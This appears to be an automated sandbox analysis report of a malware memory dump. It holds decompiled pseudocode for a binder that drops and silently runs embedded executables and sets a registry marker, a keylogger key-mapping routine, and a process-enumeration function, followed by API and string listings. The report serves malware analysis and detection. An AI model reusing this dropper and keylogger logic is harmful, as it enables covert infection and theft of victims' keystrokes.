						__eflags =  *((char*)(_t206 + 0x220));
						if(__eflags != 0) {
							L9:
							_t110 =  *((intOrPtr*)(_t206 + 0x218));
							__eflags = _t110;
							if(_t110 != 0) {
								__eflags = _t110 - 1;
								if(_t110 != 1) {
									__eflags = _t110 - 2;
									if(_t110 != 2) {
										__eflags = _t110 - 3;
										if(_t110 != 3) {
											__eflags = _t110 - 4;
											if(__eflags == 0) {
												__eflags = E00C83100();
												if(__eflags != 0) {
													E00C81C90( &_v6788, E00C833A8(E00C83100(), 0xc84580, __eflags));
													_push(_v6788);
													E00C81CD8( &_v6792, 0x105, _t206);
													_pop(_t258);
													E00C81D10( &_v12, _v6792, _t258, __eflags);
												}
											}
										} else {
											E00C81CD8( &_v6780, 0x105, _t206);
											_push(_v6780);
											E00C81C90( &_v6784, E00C82FE0());
											_pop(_t223);
											E00C81D10( &_v12, _t223, _v6784, __eflags);
										}
									} else {
										E00C81CD8( &_v6772, 0x105, _t206);
										_push(_v6772);
										E00C81C90( &_v6776, E00C83060(_t206));
										_pop(_t225);
										E00C81D10( &_v12, _t225, _v6776, __eflags);
									}
								} else {
									E00C81CD8( &_v6764, 0x105, _t206);
									_push(_v6764);
									E00C83034();
									E00C81C90( &_v6768, _v6764);
									_pop(_t227);
									E00C81D10( &_v12, _t227, _v6768, __eflags);
								}
							} else {
								E00C81CD8( &_v6756, 0x105, _t206);
								_push(_v6756);
								E00C81C90( &_v6760, E00C83008());
								_pop(_t229);
								E00C81D10( &_v12, _t229, _v6760, __eflags);
							}
							E00C81D10( &_v6796, L".exe", _v12, __eflags);
							__eflags = E00C83218(E00C81CF4(_v6796), E00C84578, 4, 0);
							if(__eflags != 0) {
								_t250 = _v12;
								E00C81D10( &_v6808, L".xtr", _t250, __eflags);
								DeleteFileW(E00C81CF4(_v6808));
							} else {
								E00C81C90( &_v6800, E00C833A8(E00C82FE0(), 0xc84580, __eflags));
								_push(_v6800);
								E00C81CD8( &_v6804, 0x105, _t206);
								_pop(_t250);
								E00C81D10( &_v12, _v6804, _t250, __eflags);
							}
							_t122 = E00C81D04(_v16);
							asm("cdq");
							_push(_t250);
							_push(_t122 + _t122);
							_push(E00C81CF4(_v16));
							_t284 = E00C81CF4(_v12);
							_pop(_t251);
							E00C83218(_t284, _t251);
							_t130 =  *((intOrPtr*)(_t206 + 0x21c));
							__eflags = _t130 - 2;
							if(_t130 != 2) {
								__eflags = _t130 - 1;
								if(_t130 != 1) {
									__eflags = _t130;
									if(_t130 == 0) {
										ShellExecuteW(0, L"open", _t284, 0, 0, 1);
									}
								} else {
									ShellExecuteW(0, L"open", _t284, 0, 0, 0);
								}
							}
							continue;
						}
						_push(0);
						_push( &_v6744);
						E00C81C90( &_v6748, E00C833A8(L"SOFTWARE\\",  &_v1308, __eflags));
						_push(_v6748);
						E00C81CD8( &_v6752, 0x105, _t206);
						_pop(_t274);
						E00C82E70(0x80000001, _t206, _v6752, _t274, _t284);
						E00C81DBC(_v6744, 0xc84570);
						if(__eflags == 0) {
							continue;
						} else {
							E00C82F90(0x80000001, E00C833A8(L"SOFTWARE\\",  &_v1308, __eflags), __eflags, 2, E00C84578);
							goto L9;
						}
					}
					goto L29;
				}
				L1:
				_push(0);
				_push(0);
				_t207 = _t207 - 1;
				if(_t207 != 0) {
					goto L1;
				} else {
					_push(_t207);
					_t284 = __eax;
					memcpy( &_v6188, __eax, 0x607 << 2);
					_t282 =  &(_t284[0x607]);
					_t206 =  &_v6740;
					_push(_t286);
					_push(0xc8453a);
					_push( *[fs:eax]);
					 *[fs:eax] = _t287 + 0xc;
					E00C8406C( &_v8);
					E00C81DBC(_v8, 0);
					if(0 != 0) {
						_push(E00C81D04(_v8) + _t200);
						_t203 = E00C81CF4(_v8);
						_pop(_t278);
						E00C82B90(_t203, _t206, L"BINDER", _t278, _t282, _t284, E00C81D04(_v8) + _t200);
					}
					goto L4;
				}
			}

0x00c840f9
0x00c840fb
0x00c840fb
0x00c84160
0x00c84165
0x00c8416a
0x00c8450f
0x00c84511
0x00c84514
0x00c84517
0x00c84527
0x00c84539
0x00c84170
0x00c844ff
0x00c84504
0x00c84509
0x00000000
0x00000000
0x00c84178
0x00c84180
0x00c8418c
0x00c841a2
0x00c841b4
0x00c841dc
0x00c84200
0x00c84205
0x00c8420c
0x00c8429d
0x00c8429d
0x00c842a3
0x00c842a5
0x00c842e6
0x00c842e9
0x00c8432a
0x00c8432d
0x00c8436e
0x00c84371
0x00c843af
0x00c843b2
0x00c843b9
0x00c843bb
0x00c843d4
0x00c843df
0x00c843ed
0x00c843fb
0x00c843fc
0x00c843fc
0x00c843bb
0x00c84373
0x00c84380
0x00c8438b
0x00c84399
0x00c843a7
0x00c843a8
0x00c843a8
0x00c8432f
0x00c8433c
0x00c84347
0x00c84355
0x00c84363
0x00c84364
0x00c84364
0x00c842eb
0x00c842f8
0x00c84303
0x00c84304
0x00c84311
0x00c8431f
0x00c84320
0x00c84320
0x00c842a7
0x00c842b4
0x00c842bf
0x00c842cd
0x00c842db
0x00c842dc
0x00c842dc
0x00c84413
0x00c8442d
0x00c8442f
0x00c84482
0x00c84485
0x00c84496
0x00c84431
0x00c84448
0x00c84453
0x00c84461
0x00c8446f
0x00c84470
0x00c84470
0x00c8449e
0x00c844a5
0x00c844a6
0x00c844a7
0x00c844b0
0x00c844b9
0x00c844bd
0x00c844be
0x00c844c3
0x00c844c9
0x00c844cc
0x00c844ce
0x00c844d1
0x00c844e8
0x00c844ea
0x00c844fa
0x00c844fa
0x00c844d3
0x00c844e1
0x00c844e1
0x00c844d1
0x00000000
0x00c844cc
0x00c84212
0x00c8421a
0x00c84233
0x00c8423e
0x00c8424c
0x00c8425c
0x00c8425d
0x00c8426d
0x00c84272
0x00000000
0x00c84278
0x00c84298
0x00000000
0x00c84298
0x00c84272
0x00000000
0x00c844ff
0x00c84100
0x00c84100
0x00c84102
0x00c84104
0x00c84105
0x00000000
0x00c84107
0x00c84107
0x00c8410b
0x00c84118
0x00c84118
0x00c8411a
0x00c84122
0x00c84123
0x00c84128
0x00c8412b
0x00c84131
0x00c8413b
0x00c84140
0x00c8414c
0x00c84150
0x00c8415a
0x00c8415b
0x00c8415b
0x00000000
0x00c84140

APIs

Part of subcall function 00C8406C: FindResourceW.KERNEL32(00C80000,XTREMEBINDER,0000000A), ref: 00C84086
Part of subcall function 00C8406C: SizeofResource.KERNEL32(00C80000,00000000,00C80000,XTREMEBINDER,0000000A,?,?,00C8E07C,?,00C84136,00000000,00C8453A,?,00000000,00000001,00000000), ref: 00C84094
Part of subcall function 00C8406C: LoadResource.KERNEL32(00C80000,00000000,00C80000,00000000,00C80000,XTREMEBINDER,0000000A,?,?,00C8E07C,?,00C84136,00000000,00C8453A,?,00000000), ref: 00C840A2
Part of subcall function 00C8406C: LockResource.KERNEL32(00000000,00C80000,00000000,00C80000,00000000,00C80000,XTREMEBINDER,0000000A,?,?,00C8E07C,?,00C84136,00000000,00C8453A), ref: 00C840AA
Part of subcall function 00C8406C: FreeResource.KERNEL32(00000000,00000000,00C80000,00000000,00C80000,00000000,00C80000,XTREMEBINDER,0000000A,?,?,00C8E07C,?,00C84136,00000000,00C8453A), ref: 00C840D1

Part of subcall function 00C81B78: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86

DeleteFileW.KERNEL32(00000000,00000004,00000000,00000002,00000000,00000002,00000000,?,00000000,00C8453A,?,00000000,00000001,00000000,00000351,00000000), ref: 00C84496

Part of subcall function 00C83008: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00C83018

Part of subcall function 00C82E70: RegOpenKeyExW.ADVAPI32(80000001,00000000,00000000,00000001,?,00000000,00C82F77,?,00C8E07C,?), ref: 00C82EC5
Part of subcall function 00C82E70: RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,00000000,?,80000001,00000000,00000000,00000001,?,00000000,00C82F77,?,00C8E07C,?), ref: 00C82EE9
Part of subcall function 00C82E70: RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,00000000,?,?,00000000,00000000,?,00000000,?,80000001,00000000,00000000,00000001), ref: 00C82F1A
Part of subcall function 00C82E70: RegCloseKey.ADVAPI32(?,?,00000000,00000000,?,00000000,?,80000001,00000000,00000000,00000001,?,00000000,00C82F77,?,00C8E07C), ref: 00C82F23

Part of subcall function 00C82F90: RegCreateKeyW.ADVAPI32(80000001,00000000,?), ref: 00C82FA4
Part of subcall function 00C82F90: RegSetValueExW.ADVAPI32(?,ServerStarted,00000000,?,?,00000000,00C8E07C,00000000,00000000,ServerStarted,?,00C89F0A,00000002,5/3/2018 10:11:44 AM,00000000,00000000), ref: 00C82FBF
Part of subcall function 00C82F90: RegCloseKey.ADVAPI32(?,?,ServerStarted,00000000,?,?,00000000,00C8E07C,00000000,00000000,ServerStarted,?,00C89F0A,00000002,5/3/2018 10:11:44 AM,00000000), ref: 00C82FCE

ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000000), ref: 00C844E1

Part of subcall function 00C83060: VirtualAlloc.KERNEL32(00000000,00000208,00001000,00000004,svchost.exe,00000000,00C8498E,00000000,00C84B74,?,00C8E07C,00000000,00000000), ref: 00C83077

Part of subcall function 00C83034: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00C83044

Part of subcall function 00C83218: CreateFileW.KERNEL32(00000000,40000000,00000002,00000000,00000002,00000000,00000000), ref: 00C83233
Part of subcall function 00C83218: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,00C8E07C,?,00000000,?,?,00C89E6B,0000181C,00000000,00000000,00000000,00000080,00000000), ref: 00C83252
Part of subcall function 00C83218: WriteFile.KERNEL32(00000000,002C6790,?,?,00000000), ref: 00C83263
Part of subcall function 00C83218: CloseHandle.KERNEL32(00000000), ref: 00C8326F

ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00C844FA

Part of subcall function 00C82FE0: VirtualAlloc.KERNEL32(00000000,00000208,00001000,00000004,00000000,00C849F0,00000000,00C84B74,?,00C8E07C,00000000,00000000), ref: 00C82FEF
Part of subcall function 00C82FE0: GetTempPathW.KERNEL32(00000104,00000000), ref: 00C82FFC

Part of subcall function 00C833A8: VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000004,00C8E07C,?,?,00C89CE6,00000000,00000000,XTREMEUPDATE,00000064,00008007,00000000,00C8A62B), ref: 00C833D1

Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Strings

SOFTWARE\, xrefs: 00C84221, 00C84285
BINDER, xrefs: 00C84155
.xtr, xrefs: 00C8447D
.exe, xrefs: 00C8440B
open, xrefs: 00C844DA, 00C844F3

Memory Dump Source

Source File: 00000005.00000002.15179880413.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c80000_svchost.jbxd

Yara matches

Function 00C85568, Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 172
keyboard

C-Code - Quality: 98%

			E00C85568(void* __ebx, void* __ecx, signed int __edx, void* __edi, void* __esi, intOrPtr* _a4, struct HKL__* _a8) {
				signed int _v6;
				signed int _v8;
				char _v9;
				void _v265;
				char _v524;
				int _v528;
				void _v532;
				short _v788;
				char _v1044;
				char _v1048;
				char _v1052;
				void* _t41;
				void* _t48;
				int _t73;
				int _t77;
				int _t102;
				signed int _t113;
				intOrPtr _t115;
				intOrPtr* _t136;
				int _t145;
				int _t147;
				void* _t152;

				_t113 = __edx;
				_v1052 = 0;
				_v1048 = 0;
				_t41 = memcpy( &_v265, __ecx, 0x40 << 2);
				_v8 = _t113;
				_v6 = _t41;
				_t136 = _a4;
				_push(_t152);
				_push(0xc85fbf);
				_push( *[fs:eax]);
				 *[fs:eax] = _t152 + 0xfffffffffffffbf4;
				E00C81B78(_t136);
				_t102 = 0;
				E00C8291C();
				_t48 = (_v6 & 0x0000ffff) + 0xfffffff8;
				if(_t48 <= 0xf3) {
					switch( *((intOrPtr*)( *(_t48 + E00C855E2) * 4 +  &M00C856D6))) {
						case 0:
							goto L90;
						case 1:
							E00C81BB4(_t136, L"[Numpad +]");
							goto L90;
						case 2:
							__eax = __edi;
							__edx = L"[Backspace]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 3:
							__eax = __edi;
							__edx = L"[Numpad .]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 4:
							__eax = __edi;
							__edx = L"[Numpad /]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 5:
							__eax = __edi;
							__edx = L"[Esc]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 6:
							__eax = __edi;
							__edx = L"[Execute]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 7:
							__eax = __edi;
							__edx = L"[Numpad *]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 8:
							__eax = __edi;
							__edx = 0xc86088;
							__eax = E00C81BB4(__edi, 0xc86088);
							goto L90;
						case 9:
							__eax = __edi;
							__edx = 0xc86090;
							__eax = E00C81BB4(__edi, 0xc86090);
							goto L90;
						case 0xa:
							__eax = __edi;
							__edx = 0xc86098;
							__eax = E00C81BB4(__edi, 0xc86098);
							goto L90;
						case 0xb:
							__eax = __edi;
							__edx = 0xc860a0;
							__eax = E00C81BB4(__edi, 0xc860a0);
							goto L90;
						case 0xc:
							__eax = __edi;
							__edx = 0xc860a8;
							__eax = E00C81BB4(__edi, 0xc860a8);
							goto L90;
						case 0xd:
							__eax = __edi;
							__edx = 0xc860b0;
							__eax = E00C81BB4(__edi, 0xc860b0);
							goto L90;
						case 0xe:
							__eax = __edi;
							__edx = 0xc860b8;
							__eax = E00C81BB4(__edi, 0xc860b8);
							goto L90;
						case 0xf:
							__eax = __edi;
							__edx = 0xc860c0;
							__eax = E00C81BB4(__edi, 0xc860c0);
							goto L90;
						case 0x10:
							__eax = __edi;
							__edx = 0xc860c8;
							__eax = E00C81BB4(__edi, 0xc860c8);
							goto L90;
						case 0x11:
							__eax = __edi;
							__edx = 0xc860d0;
							__eax = E00C81BB4(__edi, 0xc860d0);
							goto L90;
						case 0x12:
							__eax = __edi;
							__edx = L"[Back Tab]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x13:
							__eax = __edi;
							__edx = L"[Copy]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x14:
							__eax = __edi;
							__edx = L"[Finish]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x15:
							__eax = __edi;
							__edx = L"[Reset]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x16:
							__eax = __edi;
							__edx = L"[Play]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x17:
							__eax = __edi;
							__edx = L"[Process]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x18:
							__eax = __edi;
							__edx = 0xc86160;
							__eax = E00C81BB4(__edi, 0xc86160);
							goto L90;
						case 0x19:
							__eax = __edi;
							__edx = L"[Select]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x1a:
							__eax = __edi;
							__edx = L"[Separator]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x1b:
							__eax = __edi;
							__edx = 0xc861a0;
							__eax = E00C81BB4(__edi, 0xc861a0);
							goto L90;
						case 0x1c:
							__eax = __edi;
							__edx = L"[Numpad -]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x1d:
							__eax = __edi;
							__edx = L"[Tab]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x1e:
							__eax = __edi;
							__edx = L"[Zoom]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x1f:
							__eax = __edi;
							__edx = L"[Accept]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x20:
							__eax = __edi;
							__edx = L"[Context Menu]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x21:
							__eax = __edi;
							__edx = L"[Caps Lock]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x22:
							__eax = __edi;
							__edx = L"[Delete]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x23:
							__eax = __edi;
							__edx = L"[Arrow Down]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x24:
							__eax = __edi;
							__edx = L"[End]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x25:
							__eax = __edi;
							__edx = L"[F1]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x26:
							__eax = __edi;
							__edx = L"[F10]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x27:
							__eax = __edi;
							__edx = L"[F11]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x28:
							__eax = __edi;
							__edx = L"[F12]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x29:
							__eax = __edi;
							__edx = L"[F13]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x2a:
							__eax = __edi;
							__edx = L"[F14]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x2b:
							__eax = __edi;
							__edx = L"[F15]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x2c:
							__eax = __edi;
							__edx = L"[F16]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x2d:
							__eax = __edi;
							__edx = L"[F17]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x2e:
							__eax = __edi;
							__edx = L"[F18]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x2f:
							__eax = __edi;
							__edx = L"[F19]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x30:
							__eax = __edi;
							__edx = L"[F2]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x31:
							__eax = __edi;
							__edx = L"[F20]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x32:
							__eax = __edi;
							__edx = L"[F21]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x33:
							__eax = __edi;
							__edx = L"[F22]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x34:
							__eax = __edi;
							__edx = L"[F23]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x35:
							__eax = __edi;
							__edx = L"[F24]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x36:
							__eax = __edi;
							__edx = L"[F3]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x37:
							__eax = __edi;
							__edx = L"[F4]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x38:
							__eax = __edi;
							__edx = L"[F5]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x39:
							__eax = __edi;
							__edx = L"[F6]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x3a:
							__eax = __edi;
							__edx = L"[F7]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x3b:
							__eax = __edi;
							__edx = L"[F8]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x3c:
							__eax = __edi;
							__edx = L"[F9]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x3d:
							__eax = __edi;
							__edx = L"[Help]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x3e:
							__eax = __edi;
							__edx = L"[Home]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x3f:
							__eax = __edi;
							__edx = L"[Insert]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x40:
							__eax = __edi;
							__edx = L"[Mail]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x41:
							__eax = __edi;
							__edx = L"[Media]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x42:
							__eax = __edi;
							__edx = L"[Left Ctrl]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x43:
							__eax = __edi;
							__edx = L"[Arrow Left]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x44:
							__eax = __edi;
							__edx = L"[Left Alt]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x45:
							__eax = __edi;
							__edx = L"[Next Track]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x46:
							__eax = __edi;
							__edx = L"[Play / Pause]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x47:
							__eax = __edi;
							__edx = L"[Previous Track]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x48:
							__eax = __edi;
							__edx = L"[Stop]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x49:
							__eax = __edi;
							__edx = L"[Mode Change]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x4a:
							__eax = __edi;
							__edx = L"[Page Down]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x4b:
							__eax = __edi;
							__edx = L"[Num Lock]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x4c:
							__eax = __edi;
							__edx = L"[Pause]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x4d:
							__eax = __edi;
							__edx = L"[Print]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x4e:
							__eax = __edi;
							__edx = L"[Page Up]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x4f:
							__eax = __edi;
							__edx = L"[Right Ctrl]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x50:
							__eax = __edi;
							__edx = L"[Arrow Right]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x51:
							__eax = __edi;
							__edx = L"[Right Alt]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x52:
							__eax = __edi;
							__edx = L"[Scrol Lock]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x53:
							__eax = __edi;
							__edx = L"[Sleep]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x54:
							__eax = __edi;
							__edx = L"[Print Screen]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x55:
							__eax = __edi;
							__edx = L"[Arrow Up]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x56:
							__eax = __edi;
							__edx = L"[Volume Down]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x57:
							__eax = __edi;
							__edx = L"[Volume Mute]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x58:
							__eax = __edi;
							__edx = L"[Volume Up]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
					}
				}
				L90:
				if(E00C81D04( *_t136) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *_t136) > 0 && E00C81F1C(L"Numpad",  *_t136) <= 0) {
					_t102 = 1;
					E00C81BB4(_t136, L"KeyDelBackspace");
				}
				_v9 = E00C854EC();
				_t145 = ToUnicodeEx(_v6 & 0x0000ffff, _v8 & 0x0000ffff,  &_v265,  &_v788, 0x100, 0, _a8);
				if(_t145 <= 0) {
					__eflags = _t145;
					if(_t145 < 0) {
						 *0xc8deec = _v6 & 0x0000ffff;
						 *0xc8def0 = _v8 & 0x0000ffff;
						memcpy(0xc8def4,  &_v265, 0x40 << 2);
						_t136 = _t136;
						_t147 = _t145;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t147;
						if(_t147 < 0) {
							do {
								_t73 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1),  &_v1044,  &_v788, 0x100, 0, _a8);
								__eflags = _t73;
							} while (_t73 < 0);
						}
					}
				} else {
					memcpy( &_v532, 0xc8deec, 0x42 << 2);
					_t136 = _t136;
					if(E00C81D04( *_t136) == 0) {
						E00C81CD8(_t136, 0x80,  &_v788);
						_t164 = _v9;
						if(_v9 != 0) {
							E00C85148( *_t136, _t102, 0x80,  &_v1052, _t136, 0xc8deec, __eflags);
							E00C81BB4(_t136, _v1052);
						} else {
							E00C850CC( *_t136, _t102, 0x80,  &_v1048, _t136, 0xc8deec, _t164);
							E00C81BB4(_t136, _v1048);
						}
					}
					_t77 = _v532;
					if(_t77 != 0) {
						ToUnicodeEx(_t77, _v528,  &_v524,  &_v788, 0x100, 0, _a8);
					}
					E00C8291C();
				}
				if(_t102 == 1) {
					E00C81B78(_t136);
				}
				_pop(_t115);
				 *[fs:eax] = _t115;
				_push(E00C85FC6);
				return E00C81B90( &_v1052, 2);
			}

APIs

Part of subcall function 00C81B78: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C81BB4: SysReAllocStringLen.OLEAUT32(00C89B88,00C89A90,00000014), ref: 00C81BCA

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
KeyDelBackspace, xrefs: 00C85E2A

Memory Dump Source

Source File: 00000005.00000002.15179880413.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c80000_svchost.jbxd

Yara matches

Function 00C83A54, Relevance: 12.1, APIs: 8, Instructions: 68

C-Code - Quality: 70%

			E00C83A54(WCHAR* __eax, intOrPtr* __edx) {
				short _v543;
				intOrPtr _v571;
				char _v575;
				void* _v579;
				struct tagPROCESSENTRY32W* _t9;
				WCHAR* _t16;
				void* _t17;
				WCHAR* _t26;
				void* _t27;
				WCHAR* _t29;
				void* _t30;
				void* _t31;
				void* _t34;
				void* _t35;
				intOrPtr* _t36;
				void* _t37;
				intOrPtr* _t38;

				_t36 = __edx;
				_t29 = __eax;
				_t37 = CreateToolhelp32Snapshot(2, 0);
				_v575 = 0x22c;
				_t9 =  &_v575;
				Process32FirstW(_t37, _t9);
				 *_t36 = 0;
				 *_t38 = 0;
				while(_t9 != 0) {
					_push(E00C82E48(_t29) + _t11);
					_push(CharUpperW(_t29));
					_t16 = CharUpperW(E00C83988( &_v543, __eflags));
					_pop(_t34);
					_pop(_t30);
					_t17 = E00C83960(_t16, _t30, _t34);
					__eflags = _t17 - 1;
					if(_t17 == 1) {
						L3:
						 *_t38 = 1;
						 *_t36 = _v571;
					} else {
						_push(E00C82E48(_t29) + _t22);
						_push(CharUpperW(_t29));
						_t26 = CharUpperW( &_v543);
						_pop(_t35);
						_pop(_t31);
						_t27 = E00C83960(_t26, _t31, _t35);
						__eflags = _t27 - 1;
						if(_t27 != 1) {
							_t9 = Process32NextW(_t37,  &_v579);
							continue;
						} else {
							goto L3;
						}
					}
					break;
				}
				CloseHandle(_t37);
				return  *_t38;
			}

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00C83A65
Process32FirstW.KERNEL32(00000000,?), ref: 00C83A7A
CharUpperW.USER32(01970000), ref: 00C83A94

Part of subcall function 00C83988: VirtualAlloc.KERNEL32(00000000,00000208,00001000,00000004,00000000,01970000,00C83AA3,00000000,00000000), ref: 00C839CA
Part of subcall function 00C83988: VirtualAlloc.KERNEL32(00000000,00000208,00001000,00000004,00000000,01970000,00C83AA3,00000000,00000000), ref: 00C83A0F

CharUpperW.USER32(00000000), ref: 00C83AA4
CharUpperW.USER32(01970000), ref: 00C83ABF
CharUpperW.USER32(?), ref: 00C83ACA
Process32NextW.KERNEL32(00000000,?), ref: 00C83AEC
CloseHandle.KERNEL32(00000000), ref: 00C83AF6

Memory Dump Source

Source File: 00000005.00000002.15179880413.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c80000_svchost.jbxd

Yara matches

Function 00C854D4, Relevance: 12.1, APIs: 8, Instructions: 54
keyboard

C-Code - Quality: 89%

			E00C854D4(intOrPtr* __eax, intOrPtr* __ecx, void* __edx) {
				void* _t13;
				void* _t14;
				intOrPtr _t20;

				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__ecx =  *__ecx + __eax;
				_t20 =  *__ecx;
